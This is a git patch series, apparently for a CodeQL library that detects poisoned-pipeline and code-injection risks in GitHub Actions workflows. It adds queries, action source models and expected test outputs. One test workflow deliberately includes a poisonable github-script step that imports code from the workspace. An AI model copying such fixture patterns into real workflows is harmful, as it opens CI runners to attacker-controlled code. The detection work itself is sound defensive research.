.github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -569,11 +576,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | @@ -606,8 +613,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -686,7 +695,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | @@ -719,8 +728,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -800,7 +811,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:24:43 | .github/workflows/poisonable_steps.yml@5:5:24:43 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | @@ -833,8 +844,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -855,7 +868,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From 20ce5d5344c2c7b6ff441b4295397e41e0b75723 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:16 +0200 Subject: [PATCH 381/707] Add JS local imports as Poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 12 ++++++++++++ .../.github/workflows/poisonable_steps.yml | 5 +++++ ql/test/library-tests/poisonable_steps.expected | 13 +++++++------ 3 files changed, 24 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b0c6f7aa6a9d..e22662c64db3 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,6 +23,18 @@ class PoisonableCommandStep extends PoisonableStep, Run { } } +class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { + JavascriptImportnUsesStep() { + exists(string script, string line, string import_stmt | + this.getCallee() = "actions/github-script" and + script = this.getArgument("script") and + line = script.splitAt("\n").trim() and + import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and + import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + ) + } +} + class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 608b3d5a09f8..7be32ca5c17a 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -5,6 +5,11 @@ jobs: runs-on: ubuntu-latest steps: - run: venv/bin/activate # not supported yet + - uses: actions/github-script@v7 + with: + script: | + const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') + return foo({ github, context, core }, body, number, sender) - run: . venv/bin/activate - run: echo foo; . venv/bin/activate - run: echo foo;. venv/bin/activate diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 52f38506f09d..dc6b863d0b93 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,10 +1,6 @@ | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -16,4 +12,9 @@ | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | From 1657af60dfb3debdb0cd8066d7927f29487e969d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:36 +0200 Subject: [PATCH 382/707] Model get-workflow-origin action --- .../security/UntrustedCheckoutQuery.qll | 26 +++++++++++++------ .../potiuk_get-workflow-origin.model.yml | 6 +++++ 2 files changed, 24 insertions(+), 8 deletions(-) create mode 100644 ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 8187bca9f049..a0bf48f9beb8 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -99,9 +99,13 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" ] and // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").matches("%.head_ref%") + this.getArgument("ref").regexpMatch(".*(head_ref).*") or - step.getCallee() = ["github/branch-deploy"] and + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) + or + step.getCallee() = "github/branch-deploy" and // TODO: This should be read step of the ref output var this.getArgument("ref").matches("%.ref%") ) and @@ -149,12 +153,18 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*head_sha.*") and + ( + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and + this.getArgument("ref").regexpMatch(".*(head_sha).*") + or + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml new file mode 100644 index 000000000000..0acee71af263 --- /dev/null +++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] From a2af3c654b59ae2a434d710b77aae82d01fdae5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 20:46:29 +0200 Subject: [PATCH 383/707] Account for all npm and pnpm subcommands Exclude args such as `npm -v` --- ql/lib/ext/config/poisonable_steps.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index ff3df1f699c6..56ba567aa455 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -32,12 +32,8 @@ extensions: - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm i(nstall)?"] - - ["npm run"] - - ["npm ci"] - - ["pnpm i(nstall)?"] - - ["pnpm run"] - - ["pnpm ci"] + - ["npm [a-z]"] + - ["pnpm [a-z]"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] From ee265c48796441149bf579b81237eaf5359bbebb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:38:53 +0200 Subject: [PATCH 384/707] fix(models): Slash-command-action Do not consider slash-command-action command-arguments as a remote flow source if it requires write or admin permissions --- .../codeql/actions/dataflow/FlowSources.qll | 12 + ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- .../xt0rted_slash-command-action.model.yml | 7 - ql/test/library-tests/test.expected | 414 +++++++++--------- .../.github/workflows/slash_command1.yml | 21 + .../.github/workflows/slash_command2.yml | 21 + .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + 8 files changed, 294 insertions(+), 206 deletions(-) delete mode 100644 ql/lib/ext/manual/xt0rted_slash-command-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 79934ca586bf..34f8c76df67d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -222,3 +222,15 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +class Xt0rtedSlashCommandSource extends RemoteFlowSource { + Xt0rtedSlashCommandSource() { + exists(UsesStep u | + u.getCallee() = "xt0rted/slash-command-action" and + u.getArgument("permission-level").toLowerCase() = ["read", "none"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index caa09e9c7e28..46c42da26521 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -217,7 +217,7 @@ predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node suc */ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and + pred instanceof TJActionsVerifyChangedFilesSource and o.getTarget() = pred.asExpr() and o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName() = "changed_files" and @@ -225,12 +225,26 @@ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::No ) } +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or artifactDownloadToUseStep(node1, node2) or dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml deleted file mode 100644 index 0910261d21d6..000000000000 --- a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml +++ /dev/null @@ -1,7 +0,0 @@ -extensions: - - addsTo: - pack: github/actions-all - extensible: actionsSourceModel - data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 19eda82df481..c80dc006ce7a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -46,11 +46,7 @@ steps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -62,7 +58,12 @@ steps | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -92,23 +93,23 @@ runSteps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| 